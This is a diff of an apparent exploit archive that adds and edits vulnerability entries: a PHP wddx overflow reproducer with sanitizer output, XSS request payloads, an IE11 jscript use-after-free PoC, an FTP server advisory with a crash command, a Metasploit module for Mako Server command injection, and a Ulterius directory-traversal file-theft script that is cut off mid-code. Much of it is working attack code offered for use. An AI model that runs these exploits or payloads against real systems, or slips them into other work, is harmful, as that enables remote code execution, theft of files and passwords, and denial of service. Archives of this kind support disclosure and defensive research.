+PHP 7.1.8 (cli) (built: Aug  9 2017 21:42:13) ( NTS )
+Copyright (c) 1997-2017 The PHP Group
+Zend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies
+
+Configuration:
+CC="`which gcc`" CFLAGS="-O0 -g -fsanitize=address" ./configure --disable-shared --enable-wddx
+
+Credit:
+Wei Lei and Liu Yang of Nanyang Technological University
+
+Test script:
+---------------
+$ cat wddx.php 
+*/
+<?php
+$argc = $_SERVER['argc'];
+$argv = $_SERVER['argv'];
+
+$dir_str = dirname(__FILE__);
+
+$file_str = ($dir_str)."/".$argv[1];
+
+if (!extension_loaded('wddx')) print "wddx not loaded.\n";
+
+$wddx_str = file_get_contents($file_str);
+print strlen($wddx_str) . " bytes read.\n";
+
+var_dump(wddx_deserialize($wddx_str));
+?>
+
+/*
+$ cat repro2.wddx 
+<?xml version='1.0'?>
+<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
+<wddxPacket version='1.0'>
+<header/>
+	<data>
+        	<struct>
+                    <var name='aDateTime'>
+                         <dateTime>frONt of 0 0</dateTime>
+                     </var>
+                </struct>
+	</data>
+</wddxPacket>
+
+/*
+Expected result:
+----------------
+NO CRASH
+
+Actual result:
+--------------
+$ ~/php-7.1.8/sapi/cli/php wddx.php repro2.wddx 
+309 bytes read.
+=================================================================
+==13788== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb57057fc at pc 0x809b622 bp 0xbf9d09d8 sp 0xbf9d09cc
+READ of size 1 at 0xb57057fc thread T0
+    #0 0x809b621 in timelib_meridian /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:410
+    #1 0x80e0293 in scan /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:18228
+    #2 0x80f0710 in timelib_strtotime /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:23194
+    #3 0x806afed in php_parse_date /home/weilei/php-7.1.8/ext/date/php_date.c:1455
+    #4 0x8a2c588 in php_wddx_process_data /home/weilei/php-7.1.8/ext/wddx/wddx.c:1071
+    #5 0x8a40f7b in _cdata_handler /home/weilei/php-7.1.8/ext/xml/compat.c:265
+    #6 0xb5cc06b5 in xmlParseCharData__internal_alias /home/weilei/libxml2/parser.c:4597
+    #7 0xb5d129be in xmlParseTryOrFinish /home/weilei/libxml2/parser.c:11715
+    #8 0xb5d1a462 in xmlParseChunk__internal_alias /home/weilei/libxml2/parser.c:12454
+    #9 0x8a42de6 in php_XML_Parse /home/weilei/php-7.1.8/ext/xml/compat.c:600
+    #10 0x8a2c974 in php_wddx_deserialize_ex /home/weilei/php-7.1.8/ext/wddx/wddx.c:1105
+    #11 0x8a2f394 in zif_wddx_deserialize /home/weilei/php-7.1.8/ext/wddx/wddx.c:1323
+    #12 0x8ddcd0b in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:675
+    #13 0x8dd70df in execute_ex /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:429
+    #14 0x8dd8845 in zend_execute /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:474
+    #15 0x8c32247 in zend_execute_scripts /home/weilei/php-7.1.8/Zend/zend.c:1476
+    #16 0x8a5fbc5 in php_execute_script /home/weilei/php-7.1.8/main/main.c:2537
+    #17 0x90f5a70 in do_cli /home/weilei/php-7.1.8/sapi/cli/php_cli.c:993
+    #18 0x90f834b in main /home/weilei/php-7.1.8/sapi/cli/php_cli.c:1381
+    #19 0xb5ab9a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
+    #20 0x8065230 in _start (/home/weilei/php-7.1.8/sapi/cli/php+0x8065230)
+0xb57057fc is located 0 bytes to the right of 12-byte region [0xb57057f0,0xb57057fc)
+allocated by thread T0 here:
+    #0 0xb6168854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)
+    #1 0x8b73387 in __zend_malloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2820
+    #2 0x8b704a6 in _emalloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2413
+    #3 0x8b710f1 in _safe_emalloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2472
+    #4 0x8b7164c in _ecalloc /home/weilei/php-7.1.8/Zend/zend_alloc.c:2495
+    #5 0x809bd8a in timelib_string /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:460
+    #6 0x80dfcbb in scan /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:18215
+    #7 0x80f0710 in timelib_strtotime /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:23194
+    #8 0x806afed in php_parse_date /home/weilei/php-7.1.8/ext/date/php_date.c:1455
+    #9 0x8a2c588 in php_wddx_process_data /home/weilei/php-7.1.8/ext/wddx/wddx.c:1071
+    #10 0x8a40f7b in _cdata_handler /home/weilei/php-7.1.8/ext/xml/compat.c:265
+    #11 0xb5cc06b5 in xmlParseCharData__internal_alias /home/weilei/libxml2/parser.c:4597
+    #12 0xb5d129be in xmlParseTryOrFinish /home/weilei/libxml2/parser.c:11715
+    #13 0xb5d1a462 in xmlParseChunk__internal_alias /home/weilei/libxml2/parser.c:12454
+    #14 0x8a42de6 in php_XML_Parse /home/weilei/php-7.1.8/ext/xml/compat.c:600
+    #15 0x8a2c974 in php_wddx_deserialize_ex /home/weilei/php-7.1.8/ext/wddx/wddx.c:1105
+    #16 0x8a2f394 in zif_wddx_deserialize /home/weilei/php-7.1.8/ext/wddx/wddx.c:1323
+    #17 0x8ddcd0b in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:675
+    #18 0x8dd70df in execute_ex /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:429
+    #19 0x8dd8845 in zend_execute /home/weilei/php-7.1.8/Zend/zend_vm_execute.h:474
+    #20 0x8c32247 in zend_execute_scripts /home/weilei/php-7.1.8/Zend/zend.c:1476
+    #21 0x8a5fbc5 in php_execute_script /home/weilei/php-7.1.8/main/main.c:2537
+    #22 0x90f5a70 in do_cli /home/weilei/php-7.1.8/sapi/cli/php_cli.c:993
+    #23 0x90f834b in main /home/weilei/php-7.1.8/sapi/cli/php_cli.c:1381
+    #24 0xb5ab9a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/weilei/php-7.1.8/ext/date/lib/parse_date.c:410 timelib_meridian
+Shadow bytes around the buggy address:
+  0x36ae0aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x36ae0af0: fa fa fa fa fa fa fa fa fa fa fd fa fa fa 00[04]
+  0x36ae0b00:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x36ae0b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:     fa
+  Heap righ redzone:     fb
+  Freed Heap region:     fd
+  Stack left redzone:    f1
+  Stack mid redzone:     f2
+  Stack right redzone:   f3
+  Stack partial redzone: f4
+  Stack after return:    f5
+  Stack use after scope: f8
+  Global redzone:        f9
+  Global init order:     f6
+  Poisoned by user:      f7
+  ASan internal:         fe
+==13788== ABORTING
+Aborted
+*/
\ No newline at end of file
diff --git a/platforms/multiple/remote/28981.txt b/platforms/multiple/remote/28981.txt
index 866a6bd6a..161ce5d90 100755
--- a/platforms/multiple/remote/28981.txt
+++ b/platforms/multiple/remote/28981.txt
@@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the
 
 WebSphere Application Server 6 is vulnerable; other versions may also be affected.
 
-GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1        
\ No newline at end of file
+GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
\ No newline at end of file
diff --git a/platforms/php/webapps/1317.py b/platforms/php/webapps/1317.py
index adce96a7c..00a0f67bc 100755
--- a/platforms/php/webapps/1317.py
+++ b/platforms/php/webapps/1317.py
@@ -62,4 +62,4 @@ passwd=conf[:conf.find("'")]
 print '[+]Exploit Succeed'
 print '[+]User :', user, 'Pass :', passwd
 
-# milw0rm.com [2005-11-13]        
\ No newline at end of file
+# milw0rm.com [2005-11-13]
\ No newline at end of file
diff --git a/platforms/php/webapps/26817.txt b/platforms/php/webapps/26817.txt
index 23fbf77f9..f18c234e3 100755
--- a/platforms/php/webapps/26817.txt
+++ b/platforms/php/webapps/26817.txt
@@ -1,4 +1,4 @@
-            source: http://www.securityfocus.com/bid/15855/info
+source: http://www.securityfocus.com/bid/15855/info
 
 PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
 
@@ -12,4 +12,4 @@ Insert:
 URI:
 http://www.example.com/[DIR]//modules.php?name=Web_Links
 Insert:
-<iframe src=http://www.example.com?phpnuke79 <        
\ No newline at end of file
+<iframe src=http://www.example.com?phpnuke79 <
\ No newline at end of file
diff --git a/platforms/php/webapps/38688.txt b/platforms/php/webapps/38688.txt
index 4262dd49c..7c27bca4b 100755
--- a/platforms/php/webapps/38688.txt
+++ b/platforms/php/webapps/38688.txt
@@ -1,4 +1,4 @@
-            [+] Credits: hyp3rlinx
+[+] Credits: hyp3rlinx
 
 [+] Website: hyp3rlinx.altervista.org
 
@@ -151,4 +151,4 @@ The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 
-by hyp3rlinx        
\ No newline at end of file
+by hyp3rlinx
\ No newline at end of file
diff --git a/platforms/php/webapps/43140.txt b/platforms/php/webapps/43140.txt
new file mode 100755
index 000000000..a88dc87ed
--- /dev/null
+++ b/platforms/php/webapps/43140.txt
@@ -0,0 +1,32 @@
+# Exploit Title: KirbyCMS <2.5.7 Stored Cross Site Scripting
+# Vendor Homepage: https://getkirby.com/
+# Software Link: https://getkirby.com/try
+# Discovered by: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# Platform: PHP
+# CVE: CVE-2017-16807
+
+1. Description
+   
+A cross-site Scripting (XSS) vulnerability in Kirby Panel before 2.3.3, 2.4.x before 2.4.2, and 2.5.x before 2.5.7 exists when displaying a specially prepared SVG document that has been uploaded as a content file.
+
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16807
+
+2. Proof of Concept
+
+Steps to Reproduce:
+Log in as an Editor and click on Site Options
+Add the malicious .svg file which contains the javascript to the Site
+Login to another browser with Admin Credentials.
+Click on Site Options.
+Click on the newly added .svg file
+
+3. Reference
+   
+https://getkirby.com/changelog/kirby-2-5-7
+
+4. Solution
+
+The vulnerability is patched by the vendor in the version 2.5.7.
\ No newline at end of file
diff --git a/platforms/windows/dos/43131.html b/platforms/windows/dos/43131.html
new file mode 100755
index 000000000..87ad7f75a
--- /dev/null
+++ b/platforms/windows/dos/43131.html
@@ -0,0 +1,112 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1340
+
+There is a use-after-free in jscript.dll library that can be exploited in IE11.
+
+jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library (specifically, a script tag with language="Jscript.Encode" attribute will do the trick).
+
+PoC:
+
+=========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<html>
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+</head>
+<body>
+<script language="Jscript.Encode">
+
+var e = new Error();
+
+var o = {toString:function() {
+  //alert('in toString');
+  e.name = 1;
+  CollectGarbage();
+
+  //reallocate
+  for(var i=0;i<100;i++) {
+    e.name = {};
+  }
+
+  return 'b';
+}};
+
+e.name = Array(1000).join('a');
+e.message = o;
+//alert('calling JsErrorToString');
+var result = e.toString();
+//alert('boom');
+alert(result);
+
+</script>
+</body>
+</html>
+
+<!--
+=========================================
+
+This is a use-after-free in jscript!JsErrorToString that can lead to a heap overflow. (The PoC above crashes in memcpy when attempting to copy a large amount of data).
+
+When JsErrorToString runs, it tries to concatenate “name” and “message” properties of an Error object into an AString object (AString is a string type that is implemented as a list of simpler string parts). First the function converts both “name” and “message” properties to strings using the ConvertToString function, however the second call to ConvertToString can trigger a callback (via toString) and delete the “name” string.
+
+Later, when AString is converted to the BString in AString::ConvertToBSTR, the size of the result BString could be calculated incorrectly which can lead to a heap overflow.
+
+Debug log:
+
+=========================================
+
+(10b8.1364): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000003 ebx=00000006 ecx=dcbabbb8 edx=00000003 esi=e6e8bb7f edi=e900fb9b
+eip=751c9a6c esp=09dfbdfc ebp=09dfbe04 iopl=0         nv up ei ng nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
+msvcrt!memcpy+0x270:
+751c9a6c 8a4603          mov     al,byte ptr [esi+3]        ds:002b:e6e8bb82=??
+
+0:008> k
+ # ChildEBP RetAddr  
+00 09dfbe04 7013c367 msvcrt!memcpy+0x270
+01 09dfbe28 7013c3df jscript!AString::ConvertToBSTR+0x86
+02 09dfbe30 7013eeff jscript!VAR::ConvertASTRtoBSTR+0x13
+03 09dfbe6c 7013af84 jscript!InvokeDispatch+0x424
+04 09dfbf38 7013aefe jscript!InvokeDispatchEx+0x7a
+05 09dfbf68 701244a7 jscript!VAR::InvokeByDispID+0x90
+06 09dfc360 701248ff jscript!CScriptRuntime::Run+0x12b9
+07 09dfc45c 70124783 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
+08 09dfc4b4 70124cc3 jscript!ScrFncObj::Call+0x7b
+09 09dfc558 70133797 jscript!CSession::Execute+0x23d
+0a 09dfc5a0 70135353 jscript!COleScript::ExecutePendingScripts+0x16b
+0b 09dfc61c 70135139 jscript!COleScript::ParseScriptTextCore+0x206
+0c 09dfc648 6bcecf1c jscript!COleScript::ParseScriptText+0x29
+0d 09dfc680 6bced6da MSHTML!CActiveScriptHolder::ParseScriptText+0x51
+0e 09dfc6f0 6ba5f185 MSHTML!CScriptCollection::ParseScriptText+0x1c6
+0f 09dfc7dc 6ba5ecf7 MSHTML!CScriptData::CommitCode+0x31e
+10 09dfc85c 6ba5f8bd MSHTML!CScriptData::Execute+0x232
+11 09dfc87c 6bced030 MSHTML!CHtmScriptParseCtx::Execute+0xed
+12 09dfc8d0 6bcf8265 MSHTML!CHtmParseBase::Execute+0x201
+13 09dfc8ec 6b76388c MSHTML!CHtmPost::Broadcast+0x18e
+14 09dfca24 6b894a9d MSHTML!CHtmPost::Exec+0x617
+15 09dfca44 6b894a03 MSHTML!CHtmPost::Run+0x3d
+16 09dfca60 6b89c1e5 MSHTML!PostManExecute+0x61
+17 09dfca74 6b89d578 MSHTML!PostManResume+0x7b
+18 09dfcaa4 6b796dbc MSHTML!CHtmPost::OnDwnChanCallback+0x38
+19 09dfcabc 6b6d5b90 MSHTML!CDwnChan::OnMethodCall+0x2f
+1a 09dfcb0c 6b6d577a MSHTML!GlobalWndOnMethodCall+0x16c
+1b 09dfcb60 760f62fa MSHTML!GlobalWndProc+0x103
+1c 09dfcb8c 760f6d3a user32!InternalCallWinProc+0x23
+1d 09dfcc04 760f77c4 user32!UserCallWinProcCheckWow+0x109
+1e 09dfcc64 760f788a user32!DispatchMessageWorker+0x3b5
+1f 09dfcc74 6cada8ec user32!DispatchMessageW+0xf
+20 09dffe40 6cb056d8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
+21 09dfff00 76ab2f5c IEFRAME!LCIETab_ThreadProc+0x3e7
+22 09dfff18 74693a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
+23 09dfff50 7667336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
+24 09dfff5c 77379902 kernel32!BaseThreadInitThunk+0xe
+25 09dfff9c 773798d5 ntdll!__RtlUserThreadStart+0x70
+26 09dfffb4 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+=========================================
+-->
\ No newline at end of file
diff --git a/platforms/windows/dos/43144.txt b/platforms/windows/dos/43144.txt
new file mode 100755
index 000000000..55610d952
--- /dev/null
+++ b/platforms/windows/dos/43144.txt
@@ -0,0 +1,177 @@
+X41 D-Sec GmbH Security Advisory: X41-2017-006
+
+Multiple Vulnerabilities in PSFTPd Windows FTP Server
+=====================================================
+
+Overview
+--------
+Confirmed Affected Versions: 10.0.4 Build 729
+Confirmed Patched Versions: None
+Vendor: Sergei Pleis Softwareentwicklung
+Vendor URL: http://www.psftp.de/ftp-server/
+Vector: Network
+Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
+Status: Public
+Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/
+
+
+Summary and Impact
+------------------
+Several issues have been identified, which allow attackers to hide
+information in log files, recover passwords and crash the whole server.
+
+It uses neither ASLR nor DEP to make exploitation harder.
+
+
+Product Description
+-------------------
+From the vendor page, roughly translated:
+PSFTPd is a userfriendly, functional and robust FTP server software with
+support for FTP, FTPS and SFTP.
+
+
+
+Use after free
+==============
+Severity Rating: High
+Vector: Network
+CVE: CVE-2017-15271
+CWE: 416
+CVSS Score: 7.5
+CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+
+
+Summary and Impact
+------------------
+An invalid memory access issue could be triggered remotely in the SFTP
+component of PSFTPd. This issue could be triggered prior authentication.
+The PSFTPd server did not automatically restart, which enabled attackers
+to perform a very effective DoS attack against this service. By sending
+the following SSH identification / version string to the server, a NULL
+pointer dereference could be triggered:
+
+$ cat tmp.14
+SSH-2.0-BBBBBBBB
+CCCCCCCCCCCC
+
+$ cat tmp.14 | socat - TCP:192.168.122.50:22
+
+The issue appears to be a race condition in the window message handling,
+performing the cleanup for invalid connections. Upon further
+investigation X41 D-Sec GmbH could confirm that the accessed memory was
+already freed.
+
+X41 D-Sec GmbH enabled the memory debugging functionality page heap for
+the psftpd_svc.exe exeutable using the command agflags.exe /p /disable
+psftpd_svc.exe /fulla. When observing the crash in the WinDBG 19
+debugging tool, it could be confirmed that access to an already freed
+page was taking place.
+
+
+
+Log Injection
+=============
+Severity Rating: Medium
+Vector: Network
+CVE: CVE-2017-15270
+CWE: 117
+CVSS Score: 5.3
+CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+
+
+Summary and Impact
+------------------
+The PSFTPd server does not properly escape data before writing it into a
+Comma Separated Values (CSV) file. This can be used by attackers to hide
+data in the Graphical User Interface (GUI) view and create arbitrary
+entries to a certain extent.
+Special characters as '"', ',' and '\r' are not escaped and can be used
+to add new entries to the log.
+
+
+Workarounds
+-----------
+None
+
+
+
+Passwords stored in Plain Text
+==============================
+Severity Rating: Low
+Vector: Local
+CVE: CVE-2017-15272
+CWE: 312
+CVSS Score: 3.3
+CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+
+
+Summary and Impact
+------------------
+The PSFTPd server stores its configuration inside the PSFTPd.dat. This
+file is a Microsoft Access Database and can be extracted by using the
+command "mdb-export PSFTPd.dat USERS" from mdbtools
+(https://github.com/brianb/mdbtools). The application sets the encrypt
+flag with the password "ITsILLEGAL", but this is not required to extract
+the data.
+
+The users password is shown in clear text, since it is not stored securely.
+
+
+Workarounds
+-----------
+Use the Active Directory connector for your users.
+
+
+
+FTP Bounce Scan
+===============
+Severity Rating: Medium
+Vector: Network
+CVE: CVE-2017-15269
+CWE: 441
+CVSS Score: 5.0
+CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+
+
+Summary and Impact
+------------------
+The PSFTPd server does not prevent FTP bounce scans by default.
+These can be performed using "nmap -b" and allow to perform scans via
+the FTP server.
+
+
+Workarounds
+-----------
+It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
+ Domain > Sicherheit > Register "FTP Bounce and FXP"
+
+
+
+
+Workarounds
+-----------
+None
+
+
+
+About X41 D-Sec GmbH
+--------------------
+X41 D-Sec is a provider of application security services. We focus on
+application code reviews, design review and security testing. X41 D-Sec
+GmbH was founded in 2015 by Markus Vervier. We support customers in
+various industries such as finance, software development and public
+institutions.
+
+
+
+Timeline
+--------
+2017-08-31  Issues found
+2017-09-18  Vendor contacted
+2017-09-19  Vendor reply
+2017-10-11  CVE IDs requested
+2017-10-11  CVE IDs assigned
+2017-11-06  Vendor informed us, that apparently a fixed version was
+    released. We cannot confirm, since we do not have
+    access.
+2017-11-07  Public release
\ No newline at end of file
diff --git a/platforms/windows/local/43134.c b/platforms/windows/local/43134.c
index b07306470..6f2f0dcf6 100755
--- a/platforms/windows/local/43134.c
+++ b/platforms/windows/local/43134.c
@@ -1,4 +1,4 @@
-                                                                        [+] Credits: John Page a.k.a hyp3rlinx	
+[+] Credits: John Page a.k.a hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
 [+] ISR: ApparitionSec            
@@ -139,4 +139,4 @@ is given to the author. The author is not responsible for any misuse of the info
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 
-hyp3rlinx        
\ No newline at end of file
+hyp3rlinx
diff --git a/platforms/windows/local/43139.c b/platforms/windows/local/43139.c
index 71d8cae93..fa64ef047 100755
--- a/platforms/windows/local/43139.c
+++ b/platforms/windows/local/43139.c
@@ -1,4 +1,4 @@
-                        /*
+/*
 
 Exploit Title    - IKARUS anti.virus Arbitrary Write Privilege Escalation
 Date             - 13th November 2017
@@ -274,4 +274,4 @@ int main(int argc, char *argv[])
     spawnShell();
 
     return 0;
-}        
\ No newline at end of file
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/43132.rb b/platforms/windows/remote/43132.rb
new file mode 100755
index 000000000..29813f85e
--- /dev/null
+++ b/platforms/windows/remote/43132.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Mako Server v2.5 OS Command Injection RCE',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Mako Server v2.5.
+        It's possible to inject arbitrary OS commands in the Mako Server
+        tutorial page through a PUT request to save.lsp.
+
+        Attacker input will be saved on the victims machine and can
+        be executed by sending a GET request to manage.lsp.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC
+          'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['EDB', '42683'],
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
+        ],
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Mako Server v2.5 - Windows x86/x64', { }]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Sep 3 2017'))
+
+    register_options(
+      [
+        OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
+      ]
+    )
+  end
+
+  def check
+    vprint_status('Trying to detect running Mako Server and necessary files...')
+
+    # Send GET request to determine existence of save.lsp page
+    res = send_request_cgi({
+             'method' => 'GET',
+             'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp')
+           }, 20)
+
+    # If response does not include "MakoServer.net", target is not viable.
+    if res.headers['Server'] !~ /MakoServer.net/
+      vprint_warning('Target is not a Mako Server.')
+      return CheckCode::Safe
+    end
+
+    if res.body
+      if res.body =~ /Incorrect usage/
+        # We are able to determine that the server has a save.lsp page and
+        # returns the correct output.
+        vprint_status('Mako Server save.lsp returns correct ouput.')
+        return CheckCode::Appears
+      else
+        # The page exists, but is not returning the expected output.
+        # May be a different version?
+        vprint_warning('Mako Server save.lsp did not return expected output.')
+        return CheckCode::Detected
+      end
+    else
+      # The above checks failed and exploitability could not be determined.
+      vprint_error('Unable to determine exploitability, save.lsp not found.')
+      return CheckCode::Unknown
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    print_status('Sending payload to target...')
+
+    # The double square brackets helps to ensure single/double quotes
+    # in cmd payload do not interfere with syntax of os.execute Lua function.
+    cmd = %{os.execute([[#{payload.encoded}]])}
+
+    # If users want to troubleshoot their cmd payloads, they can see the
+    # Lua function with params that the module uses in a more verbose mode.
+    vprint_status("Now executing the following command: #{cmd}")
+
+    # Send a PUT request to save.lsp with command payload
+    begin
+      vprint_status('Sending PUT request to save.lsp...')
+      send_request_cgi({
+         'method' => 'PUT',
+         'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
+         'ctype'  => 'text/plain',
+         'data'   => cmd,
+         'http'   => {
+           'X-Requested-With' => 'XMLHttpRequest',
+           'Referer' => 'http://localhost/Lua-Types.lsp'
+         }
+       }, 20)
+    rescue StandardError => e
+      fail_with(Failure::NoAccess, "Error: #{e}")
+    end
+
+    # Send a GET request to manage.lsp with execute set to true
+    begin
+      vprint_status('Sending GET request to manage.lsp...')
+      send_request_cgi({
+         'method' => 'GET',
+         'uri'    => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
+       }, 20)
+    rescue StandardError => e
+      fail_with(Failure::NoAccess, "Error: #{e}")
+    end
+  end
+end
\ No newline at end of file
diff --git a/platforms/windows/remote/43141.py b/platforms/windows/remote/43141.py
new file mode 100755
index 000000000..3dbe08793
--- /dev/null
+++ b/platforms/windows/remote/43141.py
@@ -0,0 +1,111 @@
+# Exploit Title: Ulterius Server < 1.9.5.0 Directory Traversal Arbitrary File Access
+# Date: 11/13/2017
+# Exploit Author: Rick Osgood
+# Vendor Homepage: https://ulterius.io/
+# Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d
+# Version: < 1.9.5.0
+# Tested on: Windows Server 2012 R2
+# CVE : CVE-2017-16806
+#
+# You can download almost any file that resides on the same drive letter as Ulterius server.
+# Example: http://ulteriusURL:22006/.../.../.../.../.../.../.../.../.../windows/win.ini
+#
+# Unfortunately, you need to know the path to the file you want to download.
+# Fortunately, Ulterius indexes every file on the system, and it's usually stored in the same place:
+# http://ulteriusURL:2206/.../fileIndex.db
+#
+# This script will retrieve the fileIndex.db file for you, decompress it, and process the list to
+# make it human readable. Then you can use the same script to download any juicy files you find.
+#
+# Ulterius writes the following to the fileIndex.db file:
+    # First four bytes are a timestamp so we can ignore this
+# The next four items repeat until the end of the file:
+    # filename.length (4 bytes?)
+    # filename
+    # directory.length (4 bytes?)
+    # directory
+
+import requests
+import sys
+import argparse
+import zlib
+import struct
+
+# This function grabs the filename or file path from the fileIndex
+def processChunk(i, data):
+	length = struct.unpack('B', data[i])[0]
+	length += struct.unpack('B', data[i+1])[0]
+	length += struct.unpack('B', data[i+2])[0]
+	length += struct.unpack('B', data[i+3])[0]
+	
+	i += 4
+	filename = data[i:i+length]
+	i += length
+
+	return i, filename
+
+# Main function
+def main():
+	# Parse arguments
+	parser = argparse.ArgumentParser(description='Ulterius exploit by Rick osgood')
+	parser.add_argument('url', type=str, nargs='+', help='URL of the Ulterius server including port')
+	parser.add_argument('--retrieve', metavar='FILEPATH', type=str, nargs='+', help='Retrieve file from server (e.g. c:\windows\win.ini)')
+	parser.add_argument('--index', help='Retrieve, decompress, and process fileIndex.db (List of all files indexed by Ulterius)', action='store_true')
+	args = parser.parse_args()
+
+        # We are going to retrieve a specified file
+	if args.retrieve:
+		fileName = str(args.retrieve[0])
+		
+                # This works for the default Ulterius install directory.
+		baseDir = "/.../.../.../.../.../.../.../.../.../"
+	
+                # Remove slashes from output file name
+		outFile = fileName.replace('\\','_')
+	
+		# Remove drive letter and change slashes
+		if ":\\" in fileName[:3]:
+			fileName = fileName[3:]
+	
+                # Replace slashes
+		fileName = fileName.replace('\\','/')	# Replace slashes
+	        
+                # Build URL
+		url = str(args.url[0]) + baseDir + fileName
+		print "Retrieving " + url
+	    
+                # Download file
+		r = requests.get(url=url, stream=True)	# Retrieve file
+	
+                # Write file
+		f = open(outFile, 'w')
+		f.write(r.content)
+	
+        # We are going to download the fileIndex.db file
+	if args.index:
+                # Setup the URL
+		url = args.url[0] + "/.../fileIndex.db"
+		print "Downloading " + url
+
+                # Download file
+		r = requests.get(url=url, stream=True)
+		
+                # decompress the data
+                data = zlib.decompress( r.content, -15 )
+		
+                # Open output file for writing
+		f = open('fileIndex.db', 'w')
+	
+		# Strip off header info (not sure what this is)
+		data = data[8:]
+		
+		# Process file names and write to output file
+		i = 0
